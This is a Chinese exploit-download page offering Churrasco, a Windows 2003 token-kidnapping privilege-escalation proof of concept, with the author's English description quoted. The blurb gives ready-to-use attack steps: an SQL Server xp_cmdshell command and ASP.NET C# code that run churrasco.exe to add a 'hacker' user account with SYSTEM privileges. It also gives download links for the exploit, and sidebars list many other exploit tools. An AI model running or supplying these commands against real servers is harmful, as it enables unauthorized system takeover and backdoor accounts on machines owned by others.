首頁 | 安全文章 | 安全工具 | Exploits | 本站原創 | 關于我們 | 網站地圖 | 安全論壇
  當前位置:主頁>安全工具>攻擊程序>軟件詳細
軟件名稱:  Churrasco.zip
文件類型:  .zip
界面語言:  英文軟件
軟件類型:  國外軟件
運行環境:  Win2003,WinXP,Win2000,Win9X
授權方式:  共享軟件
軟件大小:  48KB
軟件等級:  ★★★★☆
發布時間:  2008-10-09
官方網址: http://nomoreroot.blogspot.com 作者:Cerrudo
演示網址: http://nomoreroot.blogspot.com/2008/10/windows-200
軟件說明:  
(From http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html)

It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf)
was published so I decided to release a PoC exploit for Win2k3 that alows to execute code under SYSTEM account.

Basically if you can run code under any service in Win2k3 then you can own Windows, this is because Windows
services accounts can impersonate.  Other process (not services) that can impersonate are IIS 6 worker processes
so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide
shared hosting services then I would recomend to not allow users to run this kind of code from ASP.


-SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:

exec xp_cmdshell 'churrasco "net user /add hacker"'


-Exploiting IIS 6 with ASP .NET :
...
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= " \"net user /add hacker\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
...


You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip

backup link: http://milw0rm.com/sploits/2008-Churrasco.zip

Enjoy.

Cesar.
下載地址: 進入下載地址列表
下載說明: ☉推薦使用網際快車下載本站軟件,使用 WinRAR v3.10 以上版本解壓本站軟件。
☉如果這個軟件總是不能下載的請點擊報告錯誤,謝謝合作!!
☉下載本站資源,如果服務器暫不能下載請過一段時間重試!
☉如果遇到什么問題,請到本站論壇去咨尋,我們將在那里提供更多 、更好的資源!
☉本站提供的一些商業軟件是供學習研究之用,如用于商業用途,請購買正版。
[推薦] [評論(0條)] [返回頂部] [打印本頁] [關閉窗口]  
匿名評論
評論內容:(不能超過250字,需審核后才會公布,請自覺遵守互聯網相關政策法規。
 §最新評論:
  熱門軟件
·qwks.cpp(MS03-049)
·ms05039.rar
·fsie.rar
·Serv-U FTP溢出漏洞利用工具
·NBSI2破解版
·MS08-067.rar
·提權大殺器(2010黑帽大會公布的
·tfn2k.tgz
·SMBdie
·ms04-011.rar
·WinArpAttacker3.50.rar
·KiTrap0D.zip
  相關軟件
·Dbshell
·MS08-021_Gdi.tgz
·MaxHijack 1.4
·ms08-067.zip
·MS08-067.rar
·ms08-066.rar
·BIND 9.5.0-P2 Remote DNS Cache
·Word Gmail Xss Exp
·smbrelay3.zip
·JCZ3.rar
·Epfw_Exp.zip
·Samba < 3.0.20 heap overflow
 
  推薦廣告
CopyRight © 2002-2019 VFocuS.Net All Rights Reserved
期本期特码